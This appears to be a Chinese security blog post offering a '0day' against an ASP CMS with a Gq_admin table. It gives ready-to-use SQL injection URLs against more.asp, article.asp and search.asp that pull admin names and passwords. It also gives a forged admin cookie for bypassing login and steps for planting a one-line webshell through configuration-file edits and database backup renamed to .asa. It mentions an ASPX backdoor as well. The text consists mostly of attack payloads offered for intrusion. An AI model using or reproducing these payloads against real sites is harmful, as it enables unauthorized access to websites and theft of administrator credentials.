按分类归档：原创文章

介于某某某需要，就不说了。弄一个简单的aspx带参数后门上传， 如：sebug.aspx?goaction=login

转载注明出处http://sebug.cn

一个破0day 判断是否可公用登陆：0公用，1非公用   ASP/Visual Basic代码 more.asp?menu=1%20and%201=2%20union%20select%20isAloneLogin%20from%20Gq_admin%20where%20id=1    由于渗透的需要,读代码. 有的More.asp转移了位置，可尝试路径/istemp/c.asp 如何得到webshell？ 1、配置文件，插入一句话，生成文件index.html，在后台 备份或者恢复为asa 2、配置文件，插入一句话，后台备份、恢复数据库为asa Cookies欺骗，此存在后台BUG，需处理绕过checkpost： ASP/Visual Basic代码 cnzz_a1403544=0; vw1403544=%3A13019483%3A; sin1403544=none; rtime=0; ltime=1248596238734; cnzz_eid=12293633-1248596216-http%3A//192.168.1.106/52haosf/showerr.asp%3Faction%3Derror%26message%3D%253; cck_lasttime=1248596238968; cck_count=0; ASPSESSIONIDQSSRDASC=LOIFJIACGJEJNDKKDLAHPOFM; admin%5Ftee5=RandomCode=DhXKBnM0971WF067&AdminStatus=%B8%DF%BC%B6%B9%DC%C0%ED%D4%B1&AdminGrade=999&AdminPass=644c0191147c3d0c&AdminID=4&AdminFlag=&LoginName=511905    欺骗的时候，有的帐号是同时只有一个人能登陆，解决方法是获取那个人的验证码信息，来伪造放到cookies里即可： RsAdmin("RandomCode"） 搜索页面与文章页面的注射漏洞：   ASP/Visual Basic代码 article.asp?select=id=1%20union%20SELECT%201,2,adminname,4,5,6,7%20FROM%20Gq_admin%20WHERE%20id=4%20union%20select%20id,cat_id,art_title,art_date,art_count,content,isbest%20from%20Gq_article%20where%20art_title%20&keyword=%B5C4    /search.asp?menu=all&key=138516677&otype=qq%20and%201=2%20union%20select%20password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20Gq_admin%20where%20id=1